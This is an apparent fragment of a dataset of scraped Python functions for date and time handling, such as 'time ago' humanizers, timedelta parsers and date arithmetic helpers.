self.created_at.astimezone(timezone.utc)\n\n delta = humanize.naturaldelta(abs(created_at - now))\n tense = \"from now\" if now < created_at else \"ago\"\n\n return f\"{delta} {tense}\"", "def _time_delta_from_info(info):\n now = datetime.datetime.now()\n then = info.start_time\n return str(now.replace(microsecond=0) - then.replace(microsecond=0))", "def naturaldelta(value, months=True):\r\n now = _now()\r\n date, delta = date_and_delta(value)\r\n if date is None:\r\n return value\r\n\r\n use_months = months\r\n\r\n seconds = abs(delta.seconds)\r\n days = abs(delta.days)\r\n years = days // 365\r\n days = days % 365\r\n months = int(days // 30.5)\r\n\r\n if not years and days < 1:\r\n if seconds == 0:\r\n return _(\"a moment\")\r\n elif seconds == 1:\r\n return _(\"a second\")\r\n elif seconds < 60:\r\n return ngettext(\"%d second\", \"%d seconds\", seconds) % seconds\r\n elif 60 <= seconds < 120:\r\n return _(\"a minute\")\r\n elif 120 <= seconds < 3600:\r\n minutes = seconds // 60\r\n return ngettext(\"%d minute\", \"%d minutes\", minutes) % minutes\r\n elif 3600 <= seconds < 3600 * 2:\r\n return _(\"an hour\")\r\n elif 3600 < seconds:\r\n hours = seconds // 3600\r\n return ngettext(\"%d hour\", \"%d hours\", hours) % hours\r\n elif years == 0:\r\n if days == 1:\r\n return _(\"a day\")\r\n if not use_months:\r\n return ngettext(\"%d day\", \"%d days\", days) % days\r\n else:\r\n if not months:\r\n return ngettext(\"%d day\", \"%d days\", days) % days\r\n elif months == 1:\r\n return _(\"a month\")\r\n else:\r\n return ngettext(\"%d month\", \"%d months\", months) % months\r\n elif years == 1:\r\n if not months and not days:\r\n return _(\"a year\")\r\n elif not months:\r\n return ngettext(\"1 year, %d day\", \"1 year, %d days\", days) % days\r\n elif use_months:\r\n if months == 1:\r\n return _(\"1 year, 1 month\")\r\n else:\r\n return ngettext(\"1 year, %d month\",\r\n \"1 year, %d months\", months) % months\r\n else:\r\n return ngettext(\"1 year, %d day\", \"1 year, %d days\", days) % days\r\n else:\r\n return ngettext(\"%d year\", \"%d years\", years) % years", "def pretty_date(time=False):\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time \n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"", "def timesince_limited(d):\n today = datetime.datetime.now()\n delta = datetime.timedelta\n interval = today - d\n if today.strftime('%Y-%m-%d') == d.strftime('%Y-%m-%d'):\n if interval < delta(days=0, hours=1):\n return timesince(d) + ' ago '\n else:\n return d.strftime('%H:%M')\n else:\n return d", "def pretty_date(time=False):\n from datetime import datetime\n\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return \"\"\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff / 7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff / 30) + \" months ago\"\n return str(day_diff / 365) + \" years ago\"", "def timedelta(self, *a, **kw):\n from datetime import timedelta\n return timedelta(*a, **kw)", "def timeago(time=False):\n\n return arrow.get(time).humanize()", "def from_time_ago(cls, value_str):\n value_str = cls._normalize_html(value_str)\n value_str = value_str + ' ' # add trailing space to simplify regex\n # Only one of these time specifiers must be found.\n pattern = (r'^(?:(\\d+) day\\(s\\)\\s+)?'\n r'(?:(\\d+) hour\\(s\\)\\s+)?'\n r'(?:(\\d+) min\\(s\\)\\s+)?'\n r'(?:(\\d+) second\\(s\\)\\s+)?$')\n match = re.match(pattern, value_str)\n if not match or not any(match.groups()):\n raise ValueError('%r did not match in %r' % (pattern, value_str))\n seconds = 0\n if match.group(4):\n seconds += int(match.group(4)) # seconds\n if match.group(3):\n seconds += int(match.group(3)) * 60 # minutes\n if match.group(2):\n seconds += int(match.group(2)) * 60 * 60 # hours\n if match.group(1):\n seconds += int(match.group(1)) * 60 * 60 * 24 # days\n return cls(value_str, seconds)", "def seconds_ago(seconds: float) -> datetime.datetime:\n return timezone.now() - timezone.timedelta(seconds=seconds)", "def delta(self) -> timedelta:\n delta = self.data.get(\"delta\", 0)\n return timedelta(seconds=delta)", "async def humanize_time(self, value):\n if value is None:\n return \"None\"\n return str(datetime.timedelta(seconds=value))", "async def _get_tick_delta(self, pair: str) -> Tuple[float, int]:\n\n try:\n last_time = self.close_times[pair][-1]\n\n except (KeyError, IndexError, TypeError) as e:\n self.log.error('{} {} getting previous closing time: {}', pair, type(e).__name__, e)\n return (None, None)\n\n current_time = time.time()\n interval_secs = config['tick_interval_secs']\n close_time = current_time - (current_time % interval_secs)\n\n if close_time < last_time:\n self.log.error(\"You are {} seconds behind, please adjust.\", last_time - close_time)\n return (None, None)\n\n delta_seconds = int(close_time - last_time)\n\n if delta_seconds == 0:\n wait_time = interval_secs - (current_time % interval_secs)\n self.log.info(\"{} must wait {} seconds for new tick data.\", pair, wait_time)\n return (None, None)\n\n elif delta_seconds > interval_secs:\n tick_gap = delta_seconds // interval_secs\n self.log.info(\"{} is missing {} ticks.\", pair, tick_gap)\n\n else:\n tick_gap = 0\n\n return (close_time, tick_gap)", "def humanize(future, ref=None):\n\n if not ref:\n ref = datetime.now()\n\n delta = future - ref\n seconds = delta.seconds\n days = delta.days\n global_seconds = days * 24 * 60 * 60 + seconds\n minutes = int(round(seconds/60.) % 60)\n day_changes = (future - datetime(*ref.timetuple()[:3])).days\n\n if days < 0:\n raise NegativeDeltaError(\"Negative timedelta. I can only do futures!\")\n\n if global_seconds <= 45:\n if seconds <= 15:\n return 'a moment'\n else:\n return english_number(seconds, 'second', 'seconds')\n\n elif global_seconds < 60 * 59.5:\n if seconds <= 90:\n return 'about a minute'\n elif seconds <= 60 * 4.5:\n return 'about %s' % english_number(minutes, 'minute', 'minutes')\n else:\n return english_number(minutes, 'minute', 'minutes')\n\n elif global_seconds < 60 * 60 * 2.5:\n return '%s%s' % (english_number(hours(seconds), 'hour', 'hours'),\n (lambda m: '' if m is 0 else ' and %s' % english_number(m, 'minute', 'minutes'))(minutes))\n\n elif global_seconds < 60 * 60 * 24 and ref.day == future.day:\n if future.hour == 23 and future.minute == 58:\n return 'two minutes to midnight'\n return english_time(future)\n\n elif (global_seconds <= 60 * 60 * 24 * 2 and day_changes == 1):\n if future.hour == 0:\n if future.minute == 0:\n return 'midnight tonight'\n return 'tomorrow at %s' % english_time(future)\n\n elif (global_seconds <= 60 * 60 * 24 * 8 and day_changes <= 7):\n if day_changes <= 3 or (future.weekday() == 6 and ref.weekday() != 6):\n return '%s at %s' % (future.strftime('%A'), english_time(future))\n elif (future.weekday() > ref.weekday() or ref.weekday() == 6) and day_changes <= 6:\n return 'this %s at %s' % (future.strftime('%A'), english_time(future))\n else:\n return 'next %s at %s' % (future.strftime('%A'), english_time(future))\n\n elif ref.year == future.year:\n return '%s at %s' % (english_date(future), english_time(future))\n\n else:\n return '%s, %d at %s' % (english_date(future), future.year, english_time(future))\n\n raise UnformattableError(\"Couldn't format date.\")", "def _parse_datediff(args: t.List) -> exp.Expression:\n unit = None\n this = seq_get(args, 0)\n expression = seq_get(args, 1)\n\n if len(args) == 3:\n unit = this\n this = args[2]\n\n return exp.DateDiff(\n this=exp.TsOrDsToDate(this=this), expression=exp.TsOrDsToDate(this=expression), unit=unit\n )", "def prev(self):\n return self.from_date(self.date_a - datetime.timedelta(1))", "def previous(self):\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index == 0:\n return None\n return posts_by_date[index - 1]", "def date_diff(value):\n new_date = datetime.strptime(str(value), '%Y-%m-%d').date()\n delta = new_date - date.today()\n return delta.days", "def date_arithmetic() -> tuple:\n d1: datetime = datetime(2020, 2, 27)\n d2: datetime = datetime(2019, 2, 27)\n d3: datetime = datetime(2019, 9, 30)\n d4: datetime = datetime(2019, 2, 1)\n\n three_days_after_02272000: datetime = d1 + timedelta(days=3)\n three_days_after_02272017: datetime = d2 + timedelta(days=3)\n days_passed_01012017_10312017: int = (d3 - d4).days\n\n return three_days_after_02272000, three_days_after_02272017, days_passed_01012017_10312017", "def render_delta_from_now(date):\n return render_delta(__timedelta_millis(date - utc()))", "def timetext(delta, resultion = 1, bare=True):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),\r\n (60 * 60 * 24, lambda n : ungettext('day', 'days', n)),\r\n (60 * 60, lambda n: ungettext('hour', 'hours', n)),\r\n (60, lambda n: ungettext('minute', 'minutes', n)),\r\n (1, lambda n: ungettext('second', 'seconds', n))\r\n )\r\n delta = max(delta, timedelta(0))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = math.floor(since / seconds)\r\n if count != 0:\r\n break\r\n\r\n from r2.lib.strings import strings\r\n if count == 0 and delta.seconds == 0 and delta != timedelta(0):\r\n n = math.floor(delta.microseconds / 1000)\r\n s = strings.number_label % (n, ungettext(\"millisecond\", \r\n \"milliseconds\", n))\r\n else:\r\n s = strings.number_label % (count, name(int(count)))\r\n if resultion > 1:\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) / seconds2\r\n if count2 != 0:\r\n s += ', %d %s' % (count2, name2(count2))\r\n if not bare: s += ' ' + _('ago')\r\n return s", "def parse_date(date):\n now = arrow.utcnow().floor('day')\n\n if date == 'yesterday':\n return now.shift(days=-1)\n\n time_ago_match = constants.TIME_AGO_REGEX.match(date)\n\n if time_ago_match:\n time_ago = time_ago_match.groupdict()\n\n if time_ago['days_ago']:\n return now.shift(days=-int(time_ago['days_ago']))\n\n if time_ago['weeks_ago']:\n return now.shift(weeks=-int(time_ago['weeks_ago']))\n\n if time_ago['months_ago']:\n return now.shift(months=-int(time_ago['months_ago']))\n\n if time_ago['years_ago']:\n return now.shift(years=-int(time_ago['years_ago']))\n\n ret = arrow.get(date, constants.DATE_FORMATS)\n\n if ret.year == 1:\n ret = ret.replace(year=now.year)\n\n return ret", "def pretty_date(date: datetime):\n if not isinstance(date, datetime) or date > NOW:\n raise ValueError('pretty_date() only accepts datetime objects in the past')\n diff = NOW - date\n seconds = int(diff.total_seconds())\n minutes = seconds // 60\n hours = minutes // 60\n # This doesn't _feel_ very pythonic…\n if seconds < 10:\n return 'just now'\n if seconds < 60:\n return f'{seconds} seconds ago'\n if minutes < 2:\n return 'a minute ago'\n if minutes < 60:\n return f'{minutes} minutes ago'\n if hours < 2:\n return 'an hour ago'\n if hours < 24:\n return f'{hours} hours ago'\n if hours < 48:\n return 'yesterday'\n return date.strftime('%m/%d/%y')", "def timesince(dt, default=None, reverse=False):\n\n if not dt:\n return ''\n\n if default is None:\n default = u'刚刚'\n now = datetime.utcnow()\n diff = (dt - now) if reverse else now - dt\n\n if diff < timedelta(days=0):\n return default\n\n periods = (\n (diff.days / 365, u'年', u'年'),\n (diff.days / 30, u'月', u'月'),\n (diff.days / 7, u'周', u'周'),\n (diff.days, u'天', u'天'),\n (diff.seconds / 3600, u'小时', u'小时'),\n (diff.seconds / 60, u'分钟', u'分钟'),\n (diff.seconds, u'秒', u'秒'),\n )\n\n for period, singular, plural in periods:\n\n if not period:\n continue\n\n if reverse:\n if period == 1:\n return u'剩余 %d %s' % (period, singular)\n else:\n return u'剩余 %d %s' % (period, plural)\n\n else:\n if period == 1:\n return u'%d%s前' % (period, singular)\n else:\n return u'%d%s前' % (period, plural)\n\n return default", "def resolveUpdatedSinceArg(request):\n\n if 'updatedSince' in request.arguments:\n us = request.arguments['updatedSince'][0]\n # value space of US is an XML Schema DateTime\n #return time.strptime(us, \"%Y-%m-%dT%H:%M:%S%Z\")\n ma = dateTimeRE.match(us)\n m = ma.groupdict()\n \n year = 0\n if m['year']:\n try: year = int(m['year'])\n except: pass\n month = 0\n if m['month']:\n try: month = int(m['month'])\n except: pass\n day = 0\n if m['day']:\n try: day = int(m['day'])\n except: pass\n minute = 0\n if m['minute']:\n try: minute = int(m['minute'])\n except: pass\n hour = 0\n if m['hour']:\n try: hour = int(m['hour'])\n except: pass\n if m['tzoffset'] and m['tzhour']:\n if m['tzoffset'] == '-': sign = -1\n else: sign = 1\n try:\n hour += int(m['tzhour']) * sign\n if m['tzminute']:\n minute += int(m['tzminute']) * sign\n except: pass\n seconds = 0\n if m['second']:\n try: \n seconds = int(m['second'])\n if m['fraction']: \n seconds += float(m['fraction'])\n except: pass\n \n return calendar.timegm((year, month, day, hour, minute, seconds, 0, 0, -1))\n # TODO handle time zone\n \n return None", "def get_days_delta(query):\n # the format of delta: 18 days, 0:00:00\n\n try:\n delta_string = str(get_date() - get_start_date(query)).split(' ')[0]\n delta = int(delta_string)\n\n except TypeError as err:\n \"\"\"\n could get_start_date of contact because it hasn't been initialized.\n \"\"\"\n # print(\"the contact hasn't initialize the evaluation: \", err)\n return None, err\n\n except ValueError as err:\n \"\"\"\n this exception is used to handle the first day record error.\n minus the same dates will get \"0:00:00\".\n \"\"\"\n if delta_string == \"0:00:00\":\n delta = 0\n else:\n # print(\"the date has some problem: \", err)\n return None, err\n return delta", "def get_yesterday(x: Optional[Date] = None) -> Date:\n return (x or get_today()) - TimeDelta(days=1)", "def duration(value, arg=False):\n if value in (None, \"\"):\n return \"n/a\"\n out = []\n try:\n if value.days > 1:\n out.append(_(\"%i days\") % value.days)\n elif value.days == 1:\n out.append(_(\"1 day\"))\n hours = value.seconds // 3600\n if hours > 1:\n out.append(_(\"%i hours\") % hours)\n elif hours == 1:\n out.append(_(\"1 hour\"))\n minutes = (value.seconds // 60) % 60\n if minutes > 1:\n out.append(_(\"%i minutes\") % minutes)\n elif minutes == 1:\n out.append(_(\"1 minute\"))\n\n if arg:\n seconds = value.seconds % 60\n if seconds > 1:\n out.append(_(\"%i seconds\") % (value.seconds % 60))\n elif seconds == 1:\n out.append(_(\"1 second\"))\n\n if not len(out):\n if arg:\n return _(\"0 second\")\n else:\n return _(\"0 minute\")\n return \", \".join(out)\n\n except AttributeError:\n return \"\"", "def directive_to_struct_time_item(directive, value):\n if directive == DIRECTIVES.YEAR:\n # Return YEAR as TM_YEAR.\n return STRUCT_TIME.TM_YEAR, value\n elif directive == DIRECTIVES.YEAR_NO_CENTURY:\n # Return YEAR_NO_CENTURY as TM_YEAR.\n # Assume that a two-digit year is relative to the year 2000.\n return STRUCT_TIME.TM_YEAR, value + 2000\n elif directive == DIRECTIVES.MONTH:\n # Return MONTH as TM_MON.\n return STRUCT_TIME.TM_MON, value\n elif directive == DIRECTIVES.ABBREV_MONTH_NAME:\n # Return ABBREV_MONTH_NAME as TM_MON.\n return STRUCT_TIME.TM_MON, ABBREVIATED_MONTH_NAMES.index(value)\n elif directive == DIRECTIVES.MONTH_NAME:\n # Return MONTH_NAME as TM_MON.\n return STRUCT_TIME.TM_MON, MONTH_NAMES.index(value)\n elif directive == DIRECTIVES.DAY_OF_MONTH:\n # Return DAY_OF_MONTH as TM_MDAY\n return STRUCT_TIME.TM_MDAY, value\n elif directive == DIRECTIVES.HOUR_24:\n # Return HOUR_24 as TM_HOUR\n return STRUCT_TIME.TM_HOUR, value\n elif directive == DIRECTIVES.HOUR_12:\n # Return HOUR_12 as 0-based TM_HOUR\n return STRUCT_TIME.TM_HOUR, 0 if value == 12 else value\n elif directive == DIRECTIVES.MINUTE:\n # Return MINUTE as TM_MIN\n return STRUCT_TIME.TM_MIN, value\n elif directive == DIRECTIVES.SECOND:\n # Return SECOND as TM_SEC\n return STRUCT_TIME.TM_SEC, value\n elif directive == DIRECTIVES.DAY_OF_WEEK:\n # Return DAY_OF_WEEK as TM_WDAY\n return STRUCT_TIME.TM_WDAY, value\n elif directive == DIRECTIVES.ABBREV_WEEKDAY_NAME:\n # Return ABBREV_WEEKDAY_NAME as TM_WDAY\n return STRUCT_TIME.TM_WDAY, ABBREVIATED_WEEKDAY_NAMES.index(value)\n elif directive == DIRECTIVES.WEEKDAY_NAME:\n # Return WEEKDAY_NAME as TM_WDAY\n return STRUCT_TIME.TM_WDAY, WEEKDAY_NAMES.index(value)\n elif directive == DIRECTIVES.DAY_OF_YEAR:\n # Return DAY_OF_YEAR as TM_YDAY\n return STRUCT_TIME.TM_YDAY, value\n elif directive == DIRECTIVES.TIME_ZONE:\n # Take no action for TIME_ZONE.\n return None\n elif directive == DIRECTIVES.TIME_ZONE_OFFSET:\n # Return TIME_ZONE_OFFSET as TM_MIN - to be subtracted from any\n # existing minute value to arrive at UTC.\n return STRUCT_TIME.TM_MIN, -value\n elif directive == DIRECTIVES.AM_PM:\n # Return AM_PM as TM_HOUR\n # If value = 'PM' return +12 to update hour value to 24-hour format.\n return STRUCT_TIME.TM_HOUR, 12 if value == 'PM' else 0\n elif directive == DIRECTIVES.PERCENT:\n # Take no action for PERCENT.\n return None\n else:\n raise NotImplementedError(\n 'struct_time conversion not defined for directive: {}'\n .format(directive)\n )", "def prevDate(y, m, d):\n dateTuple = (y, m, d, 0, 0, 0, 0, 0, 0)\n epochSecs = mktime(dateTuple)\n prevDateTuple = localtime(epochSecs-24*60*60)\n return prevDateTuple[:3]", "def dehydrate_timedelta(value):\n months = 0\n days = value.days\n seconds = value.seconds\n nanoseconds = 1000 * value.microseconds\n return Structure(ord(b\"E\"), months, days, seconds, nanoseconds)", "def _get_datetime_or_error(self) -> dt:\n return dt(\n *(self.date[key] for key in ['year', 'month', 'day'] if key in self.date)\n )", "def time_to_next_ageout(self) -> Optional[float]:\n if not len(self):\n return None\n\n insertion_time_earliest = min(map(lambda t: t[1], self.values()))\n age_out_time = insertion_time_earliest + self._lifetime\n delta = age_out_time - time.monotonic()\n\n return delta", "def parse_date(value):\n if not value:\n return None\n value = float(value)\n seconds = (value - 25569) * 86400.0\n parsed = datetime.datetime.utcfromtimestamp(seconds)\n tz = pytz.timezone(app_config.PROJECT_TIMEZONE)\n parsed = tz.localize(parsed)\n print \"parsed\"\n print parsed\n\n return parsed", "def calculate_shorttimesince(d, now=None):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('yr', 'yr', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('mn', 'mn', n)),\r\n (60 * 60 * 24 * 7, lambda n : ungettext('wk', 'wk', n)),\r\n (60 * 60 * 24, lambda n : ungettext('d', 'd', n)),\r\n (60 * 60, lambda n: ungettext('hr', 'hr', n)),\r\n (60, lambda n: ungettext('min', 'min', n))\r\n )\r\n # Convert datetime.date to datetime.datetime for comparison\r\n if d.__class__ is not datetime.datetime:\r\n d = datetime.datetime(d.year, d.month, d.day)\r\n if now:\r\n t = now.timetuple()\r\n else:\r\n t = time.localtime()\r\n if d.tzinfo:\r\n tz = LocalTimezone(d)\r\n else:\r\n tz = None\r\n now = datetime.datetime(t[0], t[1], t[2], t[3], t[4], t[5], tzinfo=tz)\r\n\r\n # ignore microsecond part of 'd' since we removed it from 'now'\r\n delta = now - (d - datetime.timedelta(0, 0, d.microsecond))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n if since <= 0:\r\n # d is in the future compared to now, stop processing.\r\n return u'0' + ugettext('min')\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = since // seconds\r\n if count != 0:\r\n break\r\n s = ugettext('%(number)d%(type)s') % {'number': count, 'type': name(count)}\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) // seconds2\r\n if count2 != 0:\r\n s += ugettext(', %(number)d%(type)s') % {'number': count2, 'type': name2(count2)}\r\n return s", "def get_time_delta(n):\n return datetime.timedelta(days=n)", "def timedelta(self) -> datetime.timedelta:\n factor = -1 if self.negative else 1\n return datetime.timedelta(\n hours=factor * self.hours, minutes=factor * self.minutes\n )", "def expiration_delta(self):\n if self.extra_data:\n name = getattr(settings, 'AUTHENTICATOR_EXPIRATION', 'expires')\n try:\n return timedelta(seconds=int(self.extra_data.get(name)))\n except (ValueError, TypeError):\n pass\n return None", "def time_difference(tval1, tval2):\n assert isinstance(tval1, datetime.date)\n assert isinstance(tval2, datetime.date)\n\n if not isinstance(tval1, datetime.datetime) or \\\n not isinstance(tval2, datetime.datetime):\n # Comparing dates\n compare_value_1 = datetime.date(tval1.year, tval1.month, tval1.day)\n compare_value_2 = datetime.date(tval2.year, tval2.month, tval2.day)\n\n days_diff = abs((compare_value_1 - compare_value_2).days)\n return days_diff\n\n\n # Otherwise, we are comparing datetimes...\n if not isinstance(tval1, datetime.datetime):\n compare_value_1 = \\\n datetime.datetime(tval1.year, tval1.month, tval1.day, 12, 0)\n else:\n compare_value_1 = tval1\n\n if not isinstance(tval2, datetime.datetime):\n compare_value_2 = \\\n datetime.datetime(tval2.year, tval2.month, tval2.day, 12, 0)\n else:\n compare_value_2 = tval2\n\n return abs((compare_value_1 - compare_value_2).total_seconds())", "def getDate(delta):\r\n debug.p(\"FUNC:check_db_alarm.getDate\")\r\n db = connectToDB()\r\n debug.p('Get Max Date in DB')\r\n date_entry = db.query(func.max(StatLogSCP1.date))\r\n debug.p(date_entry)\r\n #max_Date = c.fetchone() #This return a tuple, 0 item is a datetime.datetime object\r\n #maxDate = max_Date[0]\r\n deltaDate = date_entry - timedelta(minutes= delta)\r\n debug.p(\"**Leaving FUNC:check_db_alarm.getDate\")\r\n return deltaDate", "def absulute2relative_time(x): \n if x.viewed:\n x.viewed_reltime=x.viewed_time-x.start\n \n if x.completed:\n x.completed_reltime=x.completed_time-x.start\n \n return x", "def pastTime(interval, unit):\n\tcurTime = int(time.time())\n\tif unit == \"d\":\n\t\t#day\n\t\tpastTime = curTime - interval * secInDay\n\telif unit == \"h\":\n\t\t#hour\n\t\tpastTime = curTime - interval * secInHour\n\telif unit == \"m\":\n\t\t#minute\n\t\tpastTime = curTime - interval * secInMinute\n\telif unit == \"s\":\n\t\t#second\n\t\tpastTime = curTime - interval\n\telif unit == \"ms\":\n\t\t#mili second\n\t\tcurTime = curTimeMs()\n\t\tpastTime = curTime - interval\n\telse:\n\t\traise ValueError(\"invalid time unit \" + unit)\n\treturn (curTime, pastTime)", "def get_date(time=False):\n time = time.replace(tzinfo=None)\n now = datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n raise ValueError('invalid date %s of type %s' % (time, type(time)))\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"A l'instant\"\n if second_diff < 60:\n return \"Il y a \" + str(second_diff) + \" secondes\"\n if second_diff < 120:\n return \"Il y a une minute\"\n if second_diff < 3600:\n return \"Il y a \" + str(int(second_diff / 60)) + \" minutes\"\n if second_diff < 7200:\n return \"Il y a une heure\"\n if second_diff < 86400:\n return \"Il y a \" + str(int(second_diff / 3600)) + \" heures\"\n if day_diff == 1:\n return \"Hier\"\n if day_diff < 7:\n return \"Il y a \" + str(day_diff) + \" jours\"\n if day_diff < 31:\n return \"Il y a \" + str(int(day_diff / 7)) + \" semaines\"\n if day_diff < 365:\n return \"Il y a \" + str(int(day_diff / 30)) + \" mois\"\n if day_diff < 730:\n return \"Il y a une année\"\n return \"Il y a \" + str(int(day_diff / 365)) + \" années\"", "def date_difference(older: datetime, newer: datetime):\n difference = newer - older\n days = difference.days\n hours = difference.seconds / 3600\n minutes = difference.seconds % 3600 / 60\n seconds = difference.seconds % 3600 % 60\n\n return {\n 'days': days,\n 'hours': hours,\n 'minutes': minutes,\n 'seconds': seconds\n }", "def duration(self):\n # type: () -> Optional[timedelta]\n\n if self.datetime_start and self.datetime_complete:\n return self.datetime_complete - self.datetime_start\n else:\n return None", "def when(self):\n\n # current UTC time\n now = datetime.datetime.utcnow()\n # calculate timedelta and return\n return now - self.creation_time", "def parse_timedelta(value: Optional[str]):\n if not value:\n return None\n unit = value[-1]\n amount = int(value[0:-1])\n if unit == \"h\":\n return timedelta(hours=amount)\n elif unit == \"m\":\n return timedelta(minutes=amount)\n elif unit == \"d\":\n return timedelta(days=amount)\n else:\n raise ValueError(f\"Invalid time unit: {value}\")", "def parse_date(date_posted: str, today: date) -> Union[date, None]:\n if not date_posted:\n return None\n\n if date_posted in {\"Just posted\", \"Today\"}:\n days_ago = 0\n else:\n days_ago = int(date_posted[0]) if date_posted else 0\n\n return today - timedelta(days=days_ago)", "def pretty_date_filter(dt, default=None):\n\n if default is None:\n default = 'just now'\n\n now = datetime.utcnow()\n diff = now - dt\n\n periods = (\n (diff.days / 365, 'year', 'years'),\n (diff.days / 30, 'month', 'months'),\n (diff.days / 7, 'week', 'weeks'),\n (diff.days, 'day', 'days'),\n (diff.seconds / 3600, 'hour', 'hours'),\n (diff.seconds / 60, 'minute', 'minutes'),\n (diff.seconds, 'second', 'seconds'),\n )\n\n for period, singular, plural in periods:\n\n if not period:\n continue\n\n if period == 1:\n return u'%d %s ago' % (period, singular)\n else:\n return u'%d %s ago' % (period, plural)\n\n return default", "def time_to_decision(self):\n if self.offending_date is None or self.date_of_decision is None:\n return None\n else:\n return self.date_of_decision - self.offending_date", "def fsince(self, key=0, max_fields=3):\n return format_duration(self.since(key), max_fields)", "def from_my_birthday (d):\n birthday = datetime(1986, 4, 23)\n return relativedelta.relativedelta(d, birthday)", "def create_timedelta():\n # timedelta(days, seconds, microseconds, milliseconds, minutes, hours, weeks)\n td = datetime.timedelta(microseconds=-1)\n # Why is this (-1, 86399, 999999)?\n # Because -1 days + (86,400 - 1) seconds = -1 second, and -1,000,000 microseconds + 999,999 microseconds = -1 microsecond\n print(td.days, td.seconds, td.microseconds) # (-1, 86399, 999999)", "def humanize_ts(timestamp=False):\n now = datetime.now()\n diff = now - datetime.fromtimestamp(timestamp)\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(second_diff)) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(second_diff / 60)) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(second_diff / 3600)) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(int(day_diff / 7)) + \" weeks ago\"\n if day_diff < 365:\n return str(int(day_diff / 30)) + \" months ago\"\n return str(int(day_diff / 365)) + \" years ago\"", "def elapsed(timestamp):\n return repoze.timeago.get_elapsed(timestamp)", "def to_timestamp(value):\n if not isinstance(value, datetime.date):\n return None\n\n return time.mktime(value.timetuple())", "def previous_date(self):\n yesterday = pendulum.yesterday('UTC')\n last_update = self.storage.last_update(self.feed)\n if not last_update or last_update < yesterday:\n last_update = yesterday\n return last_update", "def get_yesterday() -> tuple:\n logging.debug(\"Starting get_yesterday function.\")\n today = datetime.now(pytz.timezone(\"America/New_York\"))\n yesterday = (today - timedelta(days=1)).strftime(\"%Y-%m-%d\")\n yesterday_split = yesterday.split(\"-\")\n year = yesterday_split[0]\n month = yesterday_split[1]\n day = yesterday_split[2]\n\n return year, month, day", "def get_timestamp(prev_ts=None):\n t = time.time()\n t = TimeStamp(*time.gmtime(t)[:5] + (t % 60,))\n if prev_ts is not None:\n t = t.laterThan(prev_ts)\n return t", "def dt_td_to_dt(self, x, dt_current):\n try:\n x.total_seconds()\n # if it doesn't raise exception it should be a timedelta\n # we shoudl use isinstance(x, timedelta) but it's forbidden\n return(dt_current + x)\n except:\n # we assume x is a datetime\n return(x)", "def time_until(date):\n now = date_now()\n return date - now", "def dehydrate_date(value):\n return Structure(ord(b\"D\"), value.toordinal() - unix_epoch_date.toordinal())", "def get_date():\n return (datetime.now() - TIMEDELTA).isoformat()", "def __cmp__(a,b):\n td = b.duedate - a.duedate\n return td.days * 24*60*60 + td.seconds", "def date_arithmetic(): \n\n #Calculating the first Question and date \n date1 = \"Feb 27, 2000\" # %b M, %d D, %Y\n dt1 = datetime.datetime.strptime(date1,\"%b %d, %Y\") #changing the date format into python date\n num_days = 3\n dt2 = dt1 + datetime.timedelta(days=num_days)\n\n #Calculating the second Question and date \n date2 = \"Feb 27, 2017\"\n dm1 = datetime.datetime.strptime(date2,\"%b %d, %Y\")\n dm2 = dm1 + datetime.timedelta(days=num_days)\n \n #Calculating the third Question and date\n date3 = \"Jan 1, 2017\"\n date4 = \"Oct 31, 2017\"\n dm3 = 